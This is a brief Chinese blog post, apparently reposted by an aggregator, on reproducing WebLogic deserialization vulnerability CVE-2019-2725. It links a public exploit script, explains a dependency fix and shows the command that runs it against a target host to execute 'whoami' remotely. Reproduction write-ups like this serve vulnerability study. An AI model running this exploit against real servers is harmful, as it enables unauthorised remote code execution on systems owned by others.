weblogic漏洞复现

Posted 二月三十的博客

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了weblogic漏洞复现相关的知识,希望对你有一定的参考价值。

 

 

脚本下载:https://github.com/TopScrew/CVE-2019-2725

 

在执行命令:  python3 weblogic-2019-2725.py  时,会报错。

  由于py依赖的第三方库请求  logzero

  执行命令  sudo pip3 install logzero  即可。

 

执行  python3 weblogic-2019-2725.py

 

(命令回显)执行  

python3 weblogic-2019-2725.py 10.3.6 http://1.1.1.14:7001 whoami

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

以上是关于weblogic漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章

漏洞复现Weblogic 任意文件上传漏洞

漏洞复现-vulhub复现Weblogic的SSRF漏洞

漏洞复现-vulhub复现Weblogic的SSRF漏洞

vulhub Weblogic SSRF漏洞 复现

weblogic反序列化漏洞复现( CVE-2019-2725)

关于weblogic 10.3.6.0 的漏洞复现